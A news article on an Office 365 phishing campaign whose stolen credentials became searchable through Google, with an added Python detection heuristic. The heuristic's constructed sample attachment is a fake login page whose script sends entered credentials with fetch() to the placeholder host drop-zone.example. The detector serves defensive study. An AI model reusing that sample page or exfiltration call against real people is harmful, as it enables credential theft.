Hacker error exposes stolen passwords via Google search

Hackers who hit thousands of organizations worldwide in a massive phishing campaign forgot to protect their loot, leaving the stolen passwords publicly searchable via Google.

The phishing campaign has been going on for over half a year and uses dozens of domains that host the phishing sites. It has been constantly updated to make the fraudulent Microsoft Office 365 login requests look more realistic.

Creds in clear view

Despite relying on simple techniques, the campaign manages to bypass email protection filters and has garnered at least 1,000 credentials for corporate Office 365 accounts.

Researchers at the cyber security companies Check Point and Otorio, who analyzed this campaign, discovered that the hackers had exposed the stolen credentials to the public internet.

In a report published today, they explain that the attackers exfiltrate the information to domains they registered specifically for the task. Their mistake was to put the data in a publicly visible file that Google had indexed.

As a result, Google may show results for queries about a stolen email address or password, as seen in the screenshot below:

Investigators from the two cyber-security companies say the attackers also compromised legitimate WordPress servers to host the malicious PHP page delivered to victims.

“Attackers usually prefer to compromise servers instead of their own infrastructure because of the well-known reputation of existing sites,” the researchers explain.

By processing information from about 500 entries, the researchers were able to determine that businesses in the construction, energy and IT sectors were the most common targets of these phishing attacks.

Simple, effective phishing

The attackers used several phishing email themes to lure potential victims to load the landing page that collected their Microsoft Office 365 username and password.

The malicious emails carried the target’s first name or the name of their business in the subject line and came as a Xerox scan notification in HTML format.

Opening the attachment loads it in the default browser, where a blurry image is overlaid with a fake Microsoft Office 365 login. The username field is already filled in with the victim’s email address, which usually allays suspicion of credential theft.

JavaScript code running in the background checks the validity of the credentials, sends them to the attacker’s drop-zone server, and redirects the victim to the legitimate Office 365 login page.
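As an added example (not from the Check Point/Otorio report or this article), a small Python heuristic that flags HTML mail attachments showing the traits just described: a password field, a prefilled email address, a blurred document image, a script posting to a non-Microsoft host and a redirect to the real login. The sample attachment, drop-zone.example and victim@corp.example are constructed placeholders, not indicators from the campaign.

```python
import re
from html.parser import HTMLParser

# Constructed sample modelled on the attachment described above; drop-zone.example
# and victim@corp.example are placeholders, not indicators from the campaign.
SAMPLE_HTML = """<html><body>
<img src="scan_preview.jpg" style="filter: blur(6px)">
<form id="login"><h2>Microsoft Office 365</h2>
<input type="email" name="user" value="victim@corp.example">
<input type="password" name="pass"><button type="submit">Sign in</button></form>
<script>
document.getElementById("login").onsubmit = function (e) {
  e.preventDefault();
  fetch("https://drop-zone.example/collect.php", {method: "POST", body: new FormData(this)});
  location.href = "https://login.microsoftonline.com/";
};
</script></body></html>"""

EMAIL_RE = re.compile(r"[^@\s\"']+@[^@\s\"']+\.[a-z]{2,}", re.I)
HOST_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)
MICROSOFT_LOGIN = {"login.microsoftonline.com", "office.com"}

class _Collector(HTMLParser):
    # Gather <input> and <img> attributes plus inline <script> bodies.
    def __init__(self):
        super().__init__()
        self.inputs, self.images, self.scripts, self._in_script = [], [], [], False
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "input": self.inputs.append(a)
        elif tag == "img": self.images.append(a)
        elif tag == "script": self._in_script = True
    def handle_endtag(self, tag):
        if tag == "script": self._in_script = False
    def handle_data(self, data):
        if self._in_script: self.scripts.append(data)

def analyze_attachment(html):
    """Return the lure traits found in an HTML mail attachment and a verdict."""
    c = _Collector(); c.feed(html)
    findings = []
    if any(i.get("type", "").lower() == "password" for i in c.inputs):
        findings.append("password field inside a mail attachment")
    prefilled = [i["value"] for i in c.inputs if EMAIL_RE.fullmatch(i.get("value", ""))]
    if prefilled:
        findings.append("username prefilled with " + prefilled[0])
    if any("blur" in i.get("style", "").lower() for i in c.images):
        findings.append("blurred image used as the document lure")
    hosts = {h.lower() for h in HOST_RE.findall("\n".join(c.scripts))}
    exfil = sorted(hosts - MICROSOFT_LOGIN)
    if exfil:
        findings.append("script posts to non-Microsoft host(s): " + ", ".join(exfil))
    if hosts & MICROSOFT_LOGIN:
        findings.append("redirects to the real Office 365 login after submit")
    return {"suspicious": len(findings) >= 3, "findings": findings}
```

Three or more traits together mark the attachment as suspicious; a plain scan notification with only a link produces no findings.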

To keep the campaign unnoticed, the actor used compromised email accounts to spread the fraudulent messages. For one attack, they mimicked the German hosting provider IONOS by 1&1.

Although this campaign started in August, the researchers found phishing emails from the same threat actor dated May 2020.

Although this is not the first time Google has indexed pages where hackers store stolen data, it shows that not all malicious actors are skilled enough to protect their operations. Even if they are not identified, at least their actions can be thwarted.
